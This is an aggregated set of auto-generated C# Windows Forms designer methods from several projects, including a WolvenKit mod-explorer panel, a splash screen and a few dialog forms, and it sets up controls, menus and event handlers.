     // splitter1
     //
     this.splitter1.Dock     = System.Windows.Forms.DockStyle.Right;
     this.splitter1.Location = new System.Drawing.Point(459, 0);
     this.splitter1.Name     = "splitter1";
     this.splitter1.Size     = new System.Drawing.Size(3, 302);
     this.m_ExtStyle1.SetStyleBackColor(this.splitter1, sc2i.win32.common.CExtStyle.EnumCouleurs.None);
     this.m_ExtStyle1.SetStyleForeColor(this.splitter1, sc2i.win32.common.CExtStyle.EnumCouleurs.None);
     this.splitter1.TabIndex = 19;
     this.splitter1.TabStop  = false;
     //
     // CFormEditOrigineChampCustom
     //
     this.AutoScaleBaseSize = new System.Drawing.Size(5, 13);
     this.BackColor         = System.Drawing.Color.White;
     this.CancelButton      = this.m_btnAnnuler;
     this.ClientSize        = new System.Drawing.Size(462, 302);
     this.Controls.Add(this.panel1);
     this.Name = "CFormEditOrigineChampCustom";
     this.m_ExtStyle1.SetStyleBackColor(this, sc2i.win32.common.CExtStyle.EnumCouleurs.None);
     this.m_ExtStyle1.SetStyleForeColor(this, sc2i.win32.common.CExtStyle.EnumCouleurs.None);
     this.Text  = "Computed field|100";
     this.Load += new System.EventHandler(this.CFormEditVariableFiltreCalculee_Load);
     this.c2iPanelOmbre1.ResumeLayout(false);
     this.c2iPanelOmbre1.PerformLayout();
     this.panel1.ResumeLayout(false);
     this.ResumeLayout(false);
 }
Example #40
0
 /// <summary>
 /// Required method for Designer support - do not modify
 /// the contents of this method with the code editor.
 /// </summary>
 private void InitializeComponent()
 {
     this.components = new System.ComponentModel.Container();
     System.ComponentModel.ComponentResourceManager resources = new System.ComponentModel.ComponentResourceManager(typeof(GlobalImageCollectionHolder));
     this.sharedImageCollection1 = new DevExpress.Utils.SharedImageCollection(this.components);
     ((System.ComponentModel.ISupportInitialize)(this.sharedImageCollection1)).BeginInit();
     ((System.ComponentModel.ISupportInitialize)(this.sharedImageCollection1.ImageSource)).BeginInit();
     //
     // sharedImageCollection1
     //
     //
     //
     //
     this.sharedImageCollection1.ImageSource.ImageStream = ((DevExpress.Utils.ImageCollectionStreamer)(resources.GetObject("sharedImageCollection1.ImageSource.ImageStream")));
     this.sharedImageCollection1.ImageSource.Images.SetKeyName(36, "0036.png");
     this.sharedImageCollection1.ImageSource.Images.SetKeyName(37, "0037.png");
     this.sharedImageCollection1.ParentControl = null;
     ((System.ComponentModel.ISupportInitialize)(this.sharedImageCollection1.ImageSource)).EndInit();
     ((System.ComponentModel.ISupportInitialize)(this.sharedImageCollection1)).EndInit();
 }
 /// <summary>
 /// Required method for Designer support - do not modify
 /// the contents of this method with the code editor.
 /// </summary>
 private void InitializeComponent()
 {
     this.components = new System.ComponentModel.Container();
     System.ComponentModel.ComponentResourceManager resources = new System.ComponentModel.ComponentResourceManager(typeof(frmModExplorer));
     this.contextMenu = new System.Windows.Forms.ContextMenuStrip(this.components);
     this.createW2animsToolStripMenuItem        = new System.Windows.Forms.ToolStripMenuItem();
     this.exportToolStripMenuItem               = new System.Windows.Forms.ToolStripMenuItem();
     this.exportW2cutscenejsonToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
     this.exportW2animsjsonToolStripMenuItem    = new System.Windows.Forms.ToolStripMenuItem();
     this.exportw2rigjsonToolStripMenuItem      = new System.Windows.Forms.ToolStripMenuItem();
     this.exportW3facjsonToolStripMenuItem      = new System.Windows.Forms.ToolStripMenuItem();
     this.exportW3facposejsonToolStripMenuItem  = new System.Windows.Forms.ToolStripMenuItem();
     this.cookToolStripMenuItem               = new System.Windows.Forms.ToolStripMenuItem();
     this.toolStripSeparator3                 = new System.Windows.Forms.ToolStripSeparator();
     this.fastRenderToolStripMenuItem         = new System.Windows.Forms.ToolStripMenuItem();
     this.toolStripSeparator5                 = new System.Windows.Forms.ToolStripSeparator();
     this.removeFileToolStripMenuItem         = new System.Windows.Forms.ToolStripMenuItem();
     this.renameToolStripMenuItem             = new System.Windows.Forms.ToolStripMenuItem();
     this.copyToolStripMenuItem               = new System.Windows.Forms.ToolStripMenuItem();
     this.pasteToolStripMenuItem              = new System.Windows.Forms.ToolStripMenuItem();
     this.copyRelativePathToolStripMenuItem   = new System.Windows.Forms.ToolStripMenuItem();
     this.markAsModDlcFileToolStripMenuItem   = new System.Windows.Forms.ToolStripMenuItem();
     this.toolStripSeparator2                 = new System.Windows.Forms.ToolStripSeparator();
     this.assetBrowserToolStripMenuItem       = new System.Windows.Forms.ToolStripMenuItem();
     this.addFileToolStripMenuItem            = new System.Windows.Forms.ToolStripMenuItem();
     this.toolStripSeparator1                 = new System.Windows.Forms.ToolStripSeparator();
     this.dumpFileToolStripMenuItem           = new System.Windows.Forms.ToolStripMenuItem();
     this.dumpXMLToolStripMenuItem            = new System.Windows.Forms.ToolStripMenuItem();
     this.dumpChunksToXMLToolStripMenuItem    = new System.Windows.Forms.ToolStripMenuItem();
     this.dumpWccliteXMLToolStripMenuItem     = new System.Windows.Forms.ToolStripMenuItem();
     this.toolStripSeparator4                 = new System.Windows.Forms.ToolStripSeparator();
     this.showFileInExplorerToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
     this.searchstrip      = new System.Windows.Forms.ToolStrip();
     this.toolStripLabel1  = new System.Windows.Forms.ToolStripLabel();
     this.searchBox        = new System.Windows.Forms.ToolStripTextBox();
     this.showhideButton   = new System.Windows.Forms.ToolStripButton();
     this.ExpandBTN        = new System.Windows.Forms.ToolStripButton();
     this.CollapseBTN      = new System.Windows.Forms.ToolStripButton();
     this.resetfilesButton = new System.Windows.Forms.ToolStripButton();
     this.modexplorerSlave = new System.IO.FileSystemWatcher();
     this.treeListView     = new BrightIdeasSoftware.TreeListView();
     this.olvColumnName    = ((BrightIdeasSoftware.OLVColumn)(new BrightIdeasSoftware.OLVColumn()));
     this.contextMenu.SuspendLayout();
     this.searchstrip.SuspendLayout();
     ((System.ComponentModel.ISupportInitialize)(this.modexplorerSlave)).BeginInit();
     ((System.ComponentModel.ISupportInitialize)(this.treeListView)).BeginInit();
     this.SuspendLayout();
     //
     // contextMenu
     //
     this.contextMenu.ImageScalingSize = new System.Drawing.Size(20, 20);
     this.contextMenu.Items.AddRange(new System.Windows.Forms.ToolStripItem[] {
         this.createW2animsToolStripMenuItem,
         this.exportToolStripMenuItem,
         this.cookToolStripMenuItem,
         this.toolStripSeparator3,
         this.fastRenderToolStripMenuItem,
         this.toolStripSeparator5,
         this.removeFileToolStripMenuItem,
         this.renameToolStripMenuItem,
         this.copyToolStripMenuItem,
         this.pasteToolStripMenuItem,
         this.copyRelativePathToolStripMenuItem,
         this.markAsModDlcFileToolStripMenuItem,
         this.toolStripSeparator2,
         this.assetBrowserToolStripMenuItem,
         this.addFileToolStripMenuItem,
         this.toolStripSeparator1,
         this.dumpFileToolStripMenuItem,
         this.toolStripSeparator4,
         this.showFileInExplorerToolStripMenuItem
     });
     this.contextMenu.Name     = "contextMenu";
     this.contextMenu.Size     = new System.Drawing.Size(197, 398);
     this.contextMenu.Opening += new System.ComponentModel.CancelEventHandler(this.contextMenu_Opening);
     this.contextMenu.Opened  += new System.EventHandler(this.contextMenu_Opened);
     //
     // createW2animsToolStripMenuItem
     //
     this.createW2animsToolStripMenuItem.Name   = "createW2animsToolStripMenuItem";
     this.createW2animsToolStripMenuItem.Size   = new System.Drawing.Size(196, 26);
     this.createW2animsToolStripMenuItem.Text   = "Create w2anims";
     this.createW2animsToolStripMenuItem.Click += new System.EventHandler(this.createW2animsToolStripMenuItem_Click);
     //
     // exportToolStripMenuItem
     //
     this.exportToolStripMenuItem.DropDownItems.AddRange(new System.Windows.Forms.ToolStripItem[] {
         this.exportW2cutscenejsonToolStripMenuItem,
         this.exportW2animsjsonToolStripMenuItem,
         this.exportw2rigjsonToolStripMenuItem,
         this.exportW3facjsonToolStripMenuItem,
         this.exportW3facposejsonToolStripMenuItem
     });
     this.exportToolStripMenuItem.Name = "exportToolStripMenuItem";
     this.exportToolStripMenuItem.Size = new System.Drawing.Size(196, 26);
     this.exportToolStripMenuItem.Text = "Export";
     //
     // exportW2cutscenejsonToolStripMenuItem
     //
     this.exportW2cutscenejsonToolStripMenuItem.Name   = "exportW2cutscenejsonToolStripMenuItem";
     this.exportW2cutscenejsonToolStripMenuItem.Size   = new System.Drawing.Size(198, 22);
     this.exportW2cutscenejsonToolStripMenuItem.Text   = "Export w2cutscene.json";
     this.exportW2cutscenejsonToolStripMenuItem.Click += new System.EventHandler(this.exportW2cutscenejsonToolStripMenuItem_Click);
     //
     // exportW2animsjsonToolStripMenuItem
     //
     this.exportW2animsjsonToolStripMenuItem.Name    = "exportW2animsjsonToolStripMenuItem";
     this.exportW2animsjsonToolStripMenuItem.Size    = new System.Drawing.Size(198, 22);
     this.exportW2animsjsonToolStripMenuItem.Text    = "Export w2anims.json";
     this.exportW2animsjsonToolStripMenuItem.Visible = false;
     this.exportW2animsjsonToolStripMenuItem.Click  += new System.EventHandler(this.exportW2animsjsonToolStripMenuItem_Click);
     //
     // exportw2rigjsonToolStripMenuItem
     //
     this.exportw2rigjsonToolStripMenuItem.Name    = "exportw2rigjsonToolStripMenuItem";
     this.exportw2rigjsonToolStripMenuItem.Size    = new System.Drawing.Size(198, 22);
     this.exportw2rigjsonToolStripMenuItem.Text    = "Export w2rig.json";
     this.exportw2rigjsonToolStripMenuItem.Visible = false;
     this.exportw2rigjsonToolStripMenuItem.Click  += new System.EventHandler(this.exportw2rigjsonToolStripMenuItem_Click);
     //
     // exportW3facjsonToolStripMenuItem
     //
     this.exportW3facjsonToolStripMenuItem.Name   = "exportW3facjsonToolStripMenuItem";
     this.exportW3facjsonToolStripMenuItem.Size   = new System.Drawing.Size(198, 22);
     this.exportW3facjsonToolStripMenuItem.Text   = "Export w3fac.json";
     this.exportW3facjsonToolStripMenuItem.Click += new System.EventHandler(this.exportW3facjsonToolStripMenuItem_Click);
     //
     // exportW3facposejsonToolStripMenuItem
     //
     this.exportW3facposejsonToolStripMenuItem.Name   = "exportW3facposejsonToolStripMenuItem";
     this.exportW3facposejsonToolStripMenuItem.Size   = new System.Drawing.Size(198, 22);
     this.exportW3facposejsonToolStripMenuItem.Text   = "Export w3fac.pose.json";
     this.exportW3facposejsonToolStripMenuItem.Click += new System.EventHandler(this.exportW3facposejsonToolStripMenuItem_Click);
     //
     // cookToolStripMenuItem
     //
     this.cookToolStripMenuItem.Enabled = false;
     this.cookToolStripMenuItem.Name    = "cookToolStripMenuItem";
     this.cookToolStripMenuItem.Size    = new System.Drawing.Size(196, 26);
     this.cookToolStripMenuItem.Text    = "Cook files in directory";
     this.cookToolStripMenuItem.Click  += new System.EventHandler(this.cookToolStripMenuItem_Click);
     //
     // toolStripSeparator3
     //
     this.toolStripSeparator3.Name = "toolStripSeparator3";
     this.toolStripSeparator3.Size = new System.Drawing.Size(193, 6);
     //
     // fastRenderToolStripMenuItem
     //
     this.fastRenderToolStripMenuItem.Name   = "fastRenderToolStripMenuItem";
     this.fastRenderToolStripMenuItem.Size   = new System.Drawing.Size(196, 26);
     this.fastRenderToolStripMenuItem.Text   = "Fast Render";
     this.fastRenderToolStripMenuItem.Click += new System.EventHandler(this.fastRenderToolStripMenuItem_Click);
     //
     // toolStripSeparator5
     //
     this.toolStripSeparator5.Name = "toolStripSeparator5";
     this.toolStripSeparator5.Size = new System.Drawing.Size(193, 6);
     //
     // removeFileToolStripMenuItem
     //
     this.removeFileToolStripMenuItem.Name   = "removeFileToolStripMenuItem";
     this.removeFileToolStripMenuItem.Size   = new System.Drawing.Size(196, 26);
     this.removeFileToolStripMenuItem.Text   = "Delete";
     this.removeFileToolStripMenuItem.Click += new System.EventHandler(this.removeFileToolStripMenuItem_Click);
     //
     // renameToolStripMenuItem
     //
     this.renameToolStripMenuItem.Name   = "renameToolStripMenuItem";
     this.renameToolStripMenuItem.Size   = new System.Drawing.Size(196, 26);
     this.renameToolStripMenuItem.Text   = "Rename";
     this.renameToolStripMenuItem.Click += new System.EventHandler(this.renameToolStripMenuItem_Click);
     //
     // copyToolStripMenuItem
     //
     this.copyToolStripMenuItem.Name   = "copyToolStripMenuItem";
     this.copyToolStripMenuItem.Size   = new System.Drawing.Size(196, 26);
     this.copyToolStripMenuItem.Text   = "Copy";
     this.copyToolStripMenuItem.Click += new System.EventHandler(this.copyToolStripMenuItem_Click);
     //
     // pasteToolStripMenuItem
     //
     this.pasteToolStripMenuItem.Name   = "pasteToolStripMenuItem";
     this.pasteToolStripMenuItem.Size   = new System.Drawing.Size(196, 26);
     this.pasteToolStripMenuItem.Text   = "Paste";
     this.pasteToolStripMenuItem.Click += new System.EventHandler(this.pasteToolStripMenuItem_Click);
     //
     // copyRelativePathToolStripMenuItem
     //
     this.copyRelativePathToolStripMenuItem.Name   = "copyRelativePathToolStripMenuItem";
     this.copyRelativePathToolStripMenuItem.Size   = new System.Drawing.Size(196, 26);
     this.copyRelativePathToolStripMenuItem.Text   = "Copy relative path";
     this.copyRelativePathToolStripMenuItem.Click += new System.EventHandler(this.copyRelativePathToolStripMenuItem_Click);
     //
     // markAsModDlcFileToolStripMenuItem
     //
     this.markAsModDlcFileToolStripMenuItem.Enabled = false;
     this.markAsModDlcFileToolStripMenuItem.Name    = "markAsModDlcFileToolStripMenuItem";
     this.markAsModDlcFileToolStripMenuItem.Size    = new System.Drawing.Size(196, 26);
     this.markAsModDlcFileToolStripMenuItem.Text    = "Mark as [Mod/Dlc] file";
     this.markAsModDlcFileToolStripMenuItem.Click  += new System.EventHandler(this.markAsModDlcFileToolStripMenuItem_Click);
     //
     // toolStripSeparator2
     //
     this.toolStripSeparator2.Name = "toolStripSeparator2";
     this.toolStripSeparator2.Size = new System.Drawing.Size(193, 6);
     //
     // assetBrowserToolStripMenuItem
     //
     this.assetBrowserToolStripMenuItem.Image  = global::WolvenKit.Properties.Resources.AddNodefromFile_354;
     this.assetBrowserToolStripMenuItem.Name   = "assetBrowserToolStripMenuItem";
     this.assetBrowserToolStripMenuItem.Size   = new System.Drawing.Size(196, 26);
     this.assetBrowserToolStripMenuItem.Text   = "Asset Browser here";
     this.assetBrowserToolStripMenuItem.Click += new System.EventHandler(this.openAssetBrowserToolStripMenuItem_Click);
     //
     // addFileToolStripMenuItem
     //
     this.addFileToolStripMenuItem.Image  = global::WolvenKit.Properties.Resources.AddNodefromFile_354;
     this.addFileToolStripMenuItem.Name   = "addFileToolStripMenuItem";
     this.addFileToolStripMenuItem.Size   = new System.Drawing.Size(196, 26);
     this.addFileToolStripMenuItem.Text   = "Add File";
     this.addFileToolStripMenuItem.Click += new System.EventHandler(this.addFileToolStripMenuItem_Click);
     //
     // toolStripSeparator1
     //
     this.toolStripSeparator1.Name = "toolStripSeparator1";
     this.toolStripSeparator1.Size = new System.Drawing.Size(193, 6);
     //
     // dumpFileToolStripMenuItem
     //
     this.dumpFileToolStripMenuItem.DropDownItems.AddRange(new System.Windows.Forms.ToolStripItem[] {
         this.dumpXMLToolStripMenuItem,
         this.dumpChunksToXMLToolStripMenuItem,
         this.dumpWccliteXMLToolStripMenuItem
     });
     this.dumpFileToolStripMenuItem.Name = "dumpFileToolStripMenuItem";
     this.dumpFileToolStripMenuItem.Size = new System.Drawing.Size(196, 26);
     this.dumpFileToolStripMenuItem.Text = "Dump File";
     //
     // dumpXMLToolStripMenuItem
     //
     this.dumpXMLToolStripMenuItem.Name   = "dumpXMLToolStripMenuItem";
     this.dumpXMLToolStripMenuItem.Size   = new System.Drawing.Size(191, 22);
     this.dumpXMLToolStripMenuItem.Text   = "Dump Header to XML";
     this.dumpXMLToolStripMenuItem.Click += new System.EventHandler(this.dumpXMLToolStripMenuItem_Click);
     //
     // dumpChunksToXMLToolStripMenuItem
     //
     this.dumpChunksToXMLToolStripMenuItem.Name   = "dumpChunksToXMLToolStripMenuItem";
     this.dumpChunksToXMLToolStripMenuItem.Size   = new System.Drawing.Size(191, 22);
     this.dumpChunksToXMLToolStripMenuItem.Text   = "Dump Chunks to XML";
     this.dumpChunksToXMLToolStripMenuItem.Click += new System.EventHandler(this.dumpChunksToXMLToolStripMenuItem_Click);
     //
     // dumpWccliteXMLToolStripMenuItem
     //
     this.dumpWccliteXMLToolStripMenuItem.Name   = "dumpWccliteXMLToolStripMenuItem";
     this.dumpWccliteXMLToolStripMenuItem.Size   = new System.Drawing.Size(191, 22);
     this.dumpWccliteXMLToolStripMenuItem.Text   = "Dump Wcc_lite XML";
     this.dumpWccliteXMLToolStripMenuItem.Click += new System.EventHandler(this.dumpWccliteXMLToolStripMenuItem_Click);
     //
     // toolStripSeparator4
     //
     this.toolStripSeparator4.Name = "toolStripSeparator4";
     this.toolStripSeparator4.Size = new System.Drawing.Size(193, 6);
     //
     // showFileInExplorerToolStripMenuItem
     //
     this.showFileInExplorerToolStripMenuItem.Name   = "showFileInExplorerToolStripMenuItem";
     this.showFileInExplorerToolStripMenuItem.Size   = new System.Drawing.Size(196, 26);
     this.showFileInExplorerToolStripMenuItem.Text   = "Show file in explorer";
     this.showFileInExplorerToolStripMenuItem.Click += new System.EventHandler(this.showFileInExplorerToolStripMenuItem_Click);
     //
     // searchstrip
     //
     this.searchstrip.ImageScalingSize = new System.Drawing.Size(20, 20);
     this.searchstrip.Items.AddRange(new System.Windows.Forms.ToolStripItem[] {
         this.toolStripLabel1,
         this.searchBox,
         this.showhideButton,
         this.ExpandBTN,
         this.CollapseBTN,
         this.resetfilesButton
     });
     this.searchstrip.Location = new System.Drawing.Point(0, 0);
     this.searchstrip.Name     = "searchstrip";
     this.searchstrip.Size     = new System.Drawing.Size(333, 27);
     this.searchstrip.TabIndex = 1;
     this.searchstrip.Text     = "toolStrip1";
     //
     // toolStripLabel1
     //
     this.toolStripLabel1.Name = "toolStripLabel1";
     this.toolStripLabel1.Size = new System.Drawing.Size(39, 24);
     this.toolStripLabel1.Text = "Filter: ";
     //
     // searchBox
     //
     this.searchBox.BorderStyle  = System.Windows.Forms.BorderStyle.None;
     this.searchBox.Font         = new System.Drawing.Font("Segoe UI", 9F);
     this.searchBox.Name         = "searchBox";
     this.searchBox.Size         = new System.Drawing.Size(54, 27);
     this.searchBox.TextChanged += new System.EventHandler(this.searchBox_TextChanged);
     //
     // showhideButton
     //
     this.showhideButton.Alignment             = System.Windows.Forms.ToolStripItemAlignment.Right;
     this.showhideButton.DisplayStyle          = System.Windows.Forms.ToolStripItemDisplayStyle.Image;
     this.showhideButton.Image                 = global::WolvenKit.Properties.Resources.LayerGroupVisibled;
     this.showhideButton.ImageTransparentColor = System.Drawing.Color.Magenta;
     this.showhideButton.Name        = "showhideButton";
     this.showhideButton.Size        = new System.Drawing.Size(24, 24);
     this.showhideButton.Text        = "Show/Hide folders";
     this.showhideButton.ToolTipText = "Show/Hide folders";
     this.showhideButton.Click      += new System.EventHandler(this.showhideButton_Click);
     //
     // ExpandBTN
     //
     this.ExpandBTN.Alignment             = System.Windows.Forms.ToolStripItemAlignment.Right;
     this.ExpandBTN.DisplayStyle          = System.Windows.Forms.ToolStripItemDisplayStyle.Image;
     this.ExpandBTN.Image                 = ((System.Drawing.Image)(resources.GetObject("ExpandBTN.Image")));
     this.ExpandBTN.ImageTransparentColor = System.Drawing.Color.Magenta;
     this.ExpandBTN.Name   = "ExpandBTN";
     this.ExpandBTN.Size   = new System.Drawing.Size(24, 24);
     this.ExpandBTN.Text   = "Expand all";
     this.ExpandBTN.Click += new System.EventHandler(this.ExpandBTN_Click);
     //
     // CollapseBTN
     //
     this.CollapseBTN.Alignment             = System.Windows.Forms.ToolStripItemAlignment.Right;
     this.CollapseBTN.DisplayStyle          = System.Windows.Forms.ToolStripItemDisplayStyle.Image;
     this.CollapseBTN.Image                 = ((System.Drawing.Image)(resources.GetObject("CollapseBTN.Image")));
     this.CollapseBTN.ImageTransparentColor = System.Drawing.Color.Magenta;
     this.CollapseBTN.Name        = "CollapseBTN";
     this.CollapseBTN.Size        = new System.Drawing.Size(24, 24);
     this.CollapseBTN.Text        = "Collapse all";
     this.CollapseBTN.ToolTipText = "Collapse all";
     this.CollapseBTN.Click      += new System.EventHandler(this.CollapseBTN_Click);
     //
     // resetfilesButton
     //
     this.resetfilesButton.DisplayStyle          = System.Windows.Forms.ToolStripItemDisplayStyle.Image;
     this.resetfilesButton.Image                 = global::WolvenKit.Properties.Resources.ExitIcon;
     this.resetfilesButton.ImageTransparentColor = System.Drawing.Color.Magenta;
     this.resetfilesButton.Name   = "resetfilesButton";
     this.resetfilesButton.Size   = new System.Drawing.Size(24, 24);
     this.resetfilesButton.Text   = "Reset filelist";
     this.resetfilesButton.Click += new System.EventHandler(this.UpdatefilelistButtonClick);
     //
     // modexplorerSlave
     //
     this.modexplorerSlave.EnableRaisingEvents   = true;
     this.modexplorerSlave.IncludeSubdirectories = true;
     this.modexplorerSlave.SynchronizingObject   = this;
     this.modexplorerSlave.Created += new System.IO.FileSystemEventHandler(this.FileChanges_Detected);
     this.modexplorerSlave.Deleted += new System.IO.FileSystemEventHandler(this.FileChanges_Detected);
     this.modexplorerSlave.Renamed += new System.IO.RenamedEventHandler(this.FileChanges_Detected);
     //
     // treeListView
     //
     this.treeListView.AllColumns.Add(this.olvColumnName);
     this.treeListView.Columns.AddRange(new System.Windows.Forms.ColumnHeader[] {
         this.olvColumnName
     });
     this.treeListView.ContextMenuStrip = this.contextMenu;
     this.treeListView.Cursor           = System.Windows.Forms.Cursors.Default;
     this.treeListView.Dock             = System.Windows.Forms.DockStyle.Fill;
     this.treeListView.HideSelection    = false;
     this.treeListView.Location         = new System.Drawing.Point(0, 27);
     this.treeListView.Name             = "treeListView";
     this.treeListView.ShowGroups       = false;
     this.treeListView.Size             = new System.Drawing.Size(333, 345);
     this.treeListView.TabIndex         = 2;
     this.treeListView.UseCompatibleStateImageBehavior = false;
     this.treeListView.View            = System.Windows.Forms.View.Details;
     this.treeListView.VirtualMode     = true;
     this.treeListView.Expanded       += new System.EventHandler <BrightIdeasSoftware.TreeBranchExpandedEventArgs>(this.treeListView_Expanded);
     this.treeListView.Collapsed      += new System.EventHandler <BrightIdeasSoftware.TreeBranchCollapsedEventArgs>(this.treeListView_Collapsed);
     this.treeListView.CellClick      += new System.EventHandler <BrightIdeasSoftware.CellClickEventArgs>(this.treeListView_CellClick);
     this.treeListView.CellRightClick += new System.EventHandler <BrightIdeasSoftware.CellRightClickEventArgs>(this.treeListView_CellRightClick);
     this.treeListView.ItemActivate   += new System.EventHandler(this.treeListView_ItemActivate);
     this.treeListView.KeyDown        += new System.Windows.Forms.KeyEventHandler(this.modFileList_KeyDown);
     //
     // olvColumnName
     //
     this.olvColumnName.AspectName     = "Name";
     this.olvColumnName.FillsFreeSpace = true;
     this.olvColumnName.Text           = "Name";
     //
     // frmModExplorer
     //
     this.AutoScaleDimensions = new System.Drawing.SizeF(6F, 13F);
     this.AutoScaleMode       = System.Windows.Forms.AutoScaleMode.Font;
     this.ClientSize          = new System.Drawing.Size(333, 372);
     this.Controls.Add(this.treeListView);
     this.Controls.Add(this.searchstrip);
     this.DockAreas = ((WeifenLuo.WinFormsUI.Docking.DockAreas)(((((WeifenLuo.WinFormsUI.Docking.DockAreas.Float | WeifenLuo.WinFormsUI.Docking.DockAreas.DockLeft)
                                                                   | WeifenLuo.WinFormsUI.Docking.DockAreas.DockRight)
                                                                  | WeifenLuo.WinFormsUI.Docking.DockAreas.DockTop)
                                                                 | WeifenLuo.WinFormsUI.Docking.DockAreas.DockBottom)));
     this.Font            = new System.Drawing.Font("Microsoft Sans Serif", 8.25F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
     this.FormBorderStyle = System.Windows.Forms.FormBorderStyle.SizableToolWindow;
     this.Icon            = ((System.Drawing.Icon)(resources.GetObject("$this.Icon")));
     this.Margin          = new System.Windows.Forms.Padding(1);
     this.Name            = "frmModExplorer";
     this.Text            = "Mod Explorer";
     this.Shown          += new System.EventHandler(this.frmModExplorer_Shown);
     this.contextMenu.ResumeLayout(false);
     this.searchstrip.ResumeLayout(false);
     this.searchstrip.PerformLayout();
     ((System.ComponentModel.ISupportInitialize)(this.modexplorerSlave)).EndInit();
     ((System.ComponentModel.ISupportInitialize)(this.treeListView)).EndInit();
     this.ResumeLayout(false);
     this.PerformLayout();
 }
Example #42
0
 /// <summary>
 /// Required method for Designer support - do not modify
 /// the contents of this method with the code editor.
 /// </summary>
 private void InitializeComponent()
 {
     this.components = new System.ComponentModel.Container();
     System.ComponentModel.ComponentResourceManager resources = new System.ComponentModel.ComponentResourceManager(typeof(SplashScreen));
     this.lblStatus        = new System.Windows.Forms.Label();
     this.pnlStatus        = new System.Windows.Forms.Panel();
     this.lblTimeRemaining = new System.Windows.Forms.Label();
     this.timer1           = new System.Windows.Forms.Timer(this.components);
     this.label1           = new System.Windows.Forms.Label();
     this.label2           = new System.Windows.Forms.Label();
     this.label3           = new System.Windows.Forms.Label();
     this.label4           = new System.Windows.Forms.Label();
     this.lblPcAdminName   = new System.Windows.Forms.Label();
     this.SuspendLayout();
     //
     // lblStatus
     //
     this.lblStatus.BackColor    = System.Drawing.Color.Transparent;
     this.lblStatus.Location     = new System.Drawing.Point(11, 202);
     this.lblStatus.Name         = "lblStatus";
     this.lblStatus.Size         = new System.Drawing.Size(228, 15);
     this.lblStatus.TabIndex     = 0;
     this.lblStatus.DoubleClick += new System.EventHandler(this.SplashScreen_DoubleClick);
     //
     // pnlStatus
     //
     this.pnlStatus.BackColor    = System.Drawing.Color.Honeydew;
     this.pnlStatus.Location     = new System.Drawing.Point(121, 231);
     this.pnlStatus.Name         = "pnlStatus";
     this.pnlStatus.Size         = new System.Drawing.Size(266, 15);
     this.pnlStatus.TabIndex     = 1;
     this.pnlStatus.DoubleClick += new System.EventHandler(this.SplashScreen_DoubleClick);
     this.pnlStatus.Paint       += new System.Windows.Forms.PaintEventHandler(this.pnlStatus_Paint);
     //
     // lblTimeRemaining
     //
     this.lblTimeRemaining.AutoSize     = true;
     this.lblTimeRemaining.BackColor    = System.Drawing.Color.Transparent;
     this.lblTimeRemaining.Location     = new System.Drawing.Point(393, 232);
     this.lblTimeRemaining.Name         = "lblTimeRemaining";
     this.lblTimeRemaining.Size         = new System.Drawing.Size(53, 12);
     this.lblTimeRemaining.TabIndex     = 2;
     this.lblTimeRemaining.Text         = "时间剩余";
     this.lblTimeRemaining.DoubleClick += new System.EventHandler(this.SplashScreen_DoubleClick);
     //
     // timer1
     //
     this.timer1.Tick += new System.EventHandler(this.timer1_Tick);
     //
     // label1
     //
     this.label1.AutoSize  = true;
     this.label1.BackColor = System.Drawing.Color.Transparent;
     this.label1.Location  = new System.Drawing.Point(135, 94);
     this.label1.Name      = "label1";
     this.label1.Size      = new System.Drawing.Size(113, 12);
     this.label1.TabIndex  = 0;
     this.label1.Text      = "本产品使用权属于:";
     //
     // label2
     //
     this.label2.AutoSize  = true;
     this.label2.BackColor = System.Drawing.Color.Transparent;
     this.label2.Location  = new System.Drawing.Point(135, 141);
     this.label2.Name      = "label2";
     this.label2.Size      = new System.Drawing.Size(125, 12);
     this.label2.TabIndex  = 0;
     this.label2.Text      = "该程序受版权法保护,";
     //
     // label3
     //
     this.label3.AutoSize  = true;
     this.label3.BackColor = System.Drawing.Color.Transparent;
     this.label3.Location  = new System.Drawing.Point(135, 158);
     this.label3.Name      = "label3";
     this.label3.Size      = new System.Drawing.Size(173, 12);
     this.label3.TabIndex  = 0;
     this.label3.Text      = "请参见“帮助”中的“关于”。";
     //
     // label4
     //
     this.label4.AutoSize  = true;
     this.label4.BackColor = System.Drawing.Color.Transparent;
     this.label4.Location  = new System.Drawing.Point(135, 175);
     this.label4.Name      = "label4";
     this.label4.Size      = new System.Drawing.Size(263, 12);
     this.label4.TabIndex  = 0;
     this.label4.Text      = "Maticsoft(C)2004-2010 李天平 保留所有权利。";
     //
     // lblPcAdminName
     //
     this.lblPcAdminName.AutoSize  = true;
     this.lblPcAdminName.BackColor = System.Drawing.Color.Transparent;
     this.lblPcAdminName.Location  = new System.Drawing.Point(254, 94);
     this.lblPcAdminName.Name      = "lblPcAdminName";
     this.lblPcAdminName.Size      = new System.Drawing.Size(23, 12);
     this.lblPcAdminName.TabIndex  = 0;
     this.lblPcAdminName.Text      = "LTP";
     //
     // SplashScreen
     //
     this.AutoScaleBaseSize = new System.Drawing.Size(6, 14);
     this.BackColor         = System.Drawing.Color.LightGray;
     this.BackgroundImage   = ((System.Drawing.Image)(resources.GetObject("$this.BackgroundImage")));
     this.ClientSize        = new System.Drawing.Size(501, 260);
     this.Controls.Add(this.lblTimeRemaining);
     this.Controls.Add(this.label1);
     this.Controls.Add(this.label2);
     this.Controls.Add(this.label3);
     this.Controls.Add(this.label4);
     this.Controls.Add(this.lblPcAdminName);
     this.Controls.Add(this.pnlStatus);
     this.Controls.Add(this.lblStatus);
     this.FormBorderStyle = System.Windows.Forms.FormBorderStyle.None;
     this.Name            = "SplashScreen";
     this.ShowInTaskbar   = false;
     this.StartPosition   = System.Windows.Forms.FormStartPosition.CenterScreen;
     this.Text            = "SplashScreen";
     this.DoubleClick    += new System.EventHandler(this.SplashScreen_DoubleClick);
     this.ResumeLayout(false);
     this.PerformLayout();
 }
 /// <summary>
 /// Required method for Designer support - do not modify
 /// the contents of this method with the code editor.
 /// </summary>
 private void InitializeComponent()
 {
     System.ComponentModel.ComponentResourceManager resources = new System.ComponentModel.ComponentResourceManager(typeof(FrmAddConnection));
     this.lblName = new DevComponents.DotNetBar.LabelX();
     this.butAdd  = new DevComponents.DotNetBar.ButtonX();
     this.butFail = new DevComponents.DotNetBar.ButtonX();
     this.txbName = new System.Windows.Forms.TextBox();
     this.SuspendLayout();
     //
     // lblName
     //
     this.lblName.BackColor = System.Drawing.Color.Transparent;
     this.lblName.Location  = new System.Drawing.Point(12, 21);
